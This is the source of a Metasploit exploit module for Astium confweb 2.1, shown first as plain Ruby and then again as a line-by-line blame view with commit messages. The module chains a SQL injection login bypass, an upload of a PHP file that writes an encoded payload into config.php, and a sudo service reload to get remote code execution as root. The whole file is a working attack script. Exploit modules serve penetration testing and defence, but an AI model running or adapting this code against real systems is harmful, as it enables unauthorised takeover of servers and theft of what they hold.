metasploit-framework/modules/exploits/linux/http/astium_sqli_upload.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # Configuration is overwritten and service reloaded

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Astium Remote Code Execution",
      'Description'    => %q{
        This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and
        lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain
        admin access. From an admin session arbitrary PHP code upload is possible. It is used
        to add the final PHP payload to "/usr/local/astium/web/php/config.php" and execute the
        "sudo /sbin/service astcfgd reload" command to reload the configuration and achieve
        remote root code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '88860' ],
          [ 'EDB', '23831' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Astium 2.1', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to the Astium installation', '/']),
        ], self.class)
  end

  def uri
    return target_uri.path
  end

  def check
    # Check version
    vprint_status("#{peer} - Trying to detect Astium")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "en", "content", "index.php")
    })

    if res and res.code == 302 and res.body =~ /direct entry from outside/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exploit
    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri),
      'vars_get' => {
        'js' => '0',
        'ctest' => '1',
        'origlink' => '/en/content/index.php'
      }
    })

    if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/
      session = $1
      print_good("#{peer} - Session cookie is [ #{session} ]")
      redirect =  URI(res.headers['Location'])
      print_status("#{peer} - Location is [ #{redirect} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
    end


    # Follow redirection process
    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri' => "#{redirect}",
      'method' => 'GET',
      'cookie' => "astiumnls=#{session}"
    })

    if not res or res.code != 200
      fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
    end


    sqlirandom = rand_text_numeric(8)

    # SQLi to bypass authentication
    sqli="system' OR '#{sqlirandom}'='#{sqlirandom}"

    # Random password
    pass = rand_text_alphanumeric(10)

    post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login"
    print_status("#{peer} - Using SQLi to bypass authentication")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "/en", "logon.php"),
      'cookie' => "astiumnls=#{session}",
      'data'   => post_data
    })

    if not res or res.code != 302
      fail_with(Failure::Unknown, "#{peer} - Login bypass was not succesful!")
    end

    # Random filename
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'

    phppayload = "<?php "
    # Make backup of the "/usr/local/astium/web/php/config.php" file
    phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
    # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
    # else during the config reload it might happen that an extra shell is spawned as the apache user.
    phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
    phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
    phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
    phppayload << "fclose($f);"
    # Reload astcfgd using sudo (so it will read our payload with root privileges).
    phppayload << "system('sudo /sbin/service astcfgd reload');"
    # Sleep 1 minute, so that we have enough time for the reload to trigger our payload
    phppayload << "sleep(60);"
    # Restore our original config.php, else the Astium web interface won't work anymore.
    phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
    phppayload << "fwrite($f, $orig);"
    phppayload << "fclose($f);"
    phppayload << "?>"

    post_data = Rex::MIME::Message.new
    post_data.add_part("submit", nil, nil, "form-data; name=\"__act\"")
    post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"")
    file = post_data.to_s

    print_status("#{peer} - Uploading Payload [ #{payload_name} ]")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "en", "database", "import.php"),
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => "astiumnls=#{session}",
      'data'   => file
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
    end

    register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}")

    print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]")
    print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "upload", "#{payload_name}")
    }, 120)

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.
    if res and res.code != 200
      print_error("#{peer} - Unexpected response...")
    end

  end

end
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Clean up 2013-09-19 16:51:07 +00:00			`Rank = ManualRanking # Configuration is overwritten and service reloaded`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::FileDropper`

			`def initialize(info={})`
			`super(update_info(info,`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`'Name' => "Astium Remote Code Execution",`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`'Description' => %q{`
Clean up 2013-09-19 16:51:07 +00:00			`This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and`
			`lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain`
			`admin access. From an admin session arbitrary PHP code upload is possible. It is used`
			`to add the final PHP payload to "/usr/local/astium/web/php/config.php" and execute the`
			`"sudo /sbin/service astcfgd reload" command to reload the configuration and achieve`
			`remote root code execution.`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module`
			`],`
			`'References' =>`
			`[`
Clean up 2013-09-19 16:51:07 +00:00			`[ 'OSVDB', '88860' ],`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`[ 'EDB', '23831' ]`
			`],`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
Clean up 2013-09-19 16:51:07 +00:00			`['Astium 2.1', {}]`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`],`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`'Privileged' => true,`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`'DisclosureDate' => "Sep 17 2013",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The base path to the Astium installation', '/']),`
			`], self.class)`
			`end`

Clean up 2013-09-19 16:51:07 +00:00			`def uri`
			`return target_uri.path`
			`end`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
Clean up 2013-09-19 16:51:07 +00:00			`def check`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`# Check version`
Progress 2014-01-22 17:20:10 +00:00			`vprint_status("#{peer} - Trying to detect Astium")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri(uri, "en", "content", "index.php")`
			`})`

			`if res and res.code == 302 and res.body =~ /direct entry from outside/`
			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Unknown`
			`end`
			`end`

			`def exploit`
			`print_status("#{peer} - Access login page")`
			`res = send_request_cgi({`
			`'method' => 'GET',`
Clean up 2013-09-19 16:51:07 +00:00			`'uri' => normalize_uri(uri),`
			`'vars_get' => {`
			`'js' => '0',`
			`'ctest' => '1',`
			`'origlink' => '/en/content/index.php'`
			`}`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`})`

Clean up 2013-09-19 16:51:07 +00:00			`if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/`
			`session = $1`
			`print_good("#{peer} - Session cookie is [ #{session} ]")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`redirect = URI(res.headers['Location'])`
			`print_status("#{peer} - Location is [ #{redirect} ]")`
			`else`
be consistent about naming 2015-04-16 19:44:56 +00:00			`fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`end`


			`# Follow redirection process`
			`print_status("#{peer} - Following redirection")`
			`res = send_request_cgi({`
			`'uri' => "#{redirect}",`
			`'method' => 'GET',`
			`'cookie' => "astiumnls=#{session}"`
			`})`

			`if not res or res.code != 200`
be consistent about naming 2015-04-16 19:44:56 +00:00			`fail_with(Failure::Unknown, "#{peer} - Redirect failed!")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`end`

Clean up 2013-09-19 16:51:07 +00:00
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`sqlirandom = rand_text_numeric(8)`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
			`# SQLi to bypass authentication`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`sqli="system' OR '#{sqlirandom}'='#{sqlirandom}"`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`# Random password`
			`pass = rand_text_alphanumeric(10)`

			`post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login"`
			`print_status("#{peer} - Using SQLi to bypass authentication")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => normalize_uri(uri, "/en", "logon.php"),`
			`'cookie' => "astiumnls=#{session}",`
			`'data' => post_data`
			`})`

			`if not res or res.code != 302`
be consistent about naming 2015-04-16 19:44:56 +00:00			`fail_with(Failure::Unknown, "#{peer} - Login bypass was not succesful!")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`end`

			`# Random filename`
			`payload_name = rand_text_alpha(rand(10) + 5) + '.php'`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00
			`phppayload = "<?php "`
			`# Make backup of the "/usr/local/astium/web/php/config.php" file`
			`phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"`
stability fixes to astium_sqli_upload 2013-09-26 03:23:33 +00:00			`# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,`
			`# else during the config reload it might happen that an extra shell is spawned as the apache user.`
Kill off EOL spaces on astium_sqli_upload. 2013-10-03 16:01:27 +00:00			`phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"`
stability fixes to astium_sqli_upload 2013-09-26 03:23:33 +00:00			`phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`phppayload << "fclose($f);"`
stability fixes to astium_sqli_upload 2013-09-26 03:23:33 +00:00			`# Reload astcfgd using sudo (so it will read our payload with root privileges).`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`phppayload << "system('sudo /sbin/service astcfgd reload');"`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`# Sleep 1 minute, so that we have enough time for the reload to trigger our payload`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`phppayload << "sleep(60);"`
			`# Restore our original config.php, else the Astium web interface won't work anymore.`
			`phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"`
			`phppayload << "fwrite($f, $orig);"`
			`phppayload << "fclose($f);"`
			`phppayload << "?>"`

			`post_data = Rex::MIME::Message.new`
			`post_data.add_part("submit", nil, nil, "form-data; name=\"__act\"")`
			`post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"")`
Fix MIME message to_s 2014-02-11 04:23:23 +00:00			`file = post_data.to_s`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00
			`print_status("#{peer} - Uploading Payload [ #{payload_name} ]")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => normalize_uri(uri, "en", "database", "import.php"),`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`'cookie' => "astiumnls=#{session}",`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`'data' => file`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`})`

			`# If the server returns 200 and the body contains our payload name,`
			`# we assume we uploaded the malicious file successfully`
Clean up 2013-09-19 16:51:07 +00:00			`if not res or res.code != 200 or res.body !~ /#{payload_name}/`
be consistent about naming 2015-04-16 19:44:56 +00:00			`fail_with(Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`end`

changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]")`
stability fixes to astium_sqli_upload 2013-09-26 03:23:33 +00:00			`print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`res = send_request_cgi({`
			`'method' => 'GET',`
changes made to astium_sqli_upload based on suggestions 2013-09-18 09:52:31 +00:00			`'uri' => normalize_uri(uri, "upload", "#{payload_name}")`
stability fixes to astium_sqli_upload 2013-09-26 03:23:33 +00:00			`}, 120)`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00
			`# If we don't get a 200 when we request our malicious payload, we suspect`
Kill off EOL spaces on astium_sqli_upload. 2013-10-03 16:01:27 +00:00			`# we don't have a shell, either.`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`if res and res.code != 200`
Clean up 2013-09-19 16:51:07 +00:00			`print_error("#{peer} - Unexpected response...")`
added Astium confweb 25399 RCE 2013-09-17 05:32:10 +00:00			`end`

			`end`

			`end`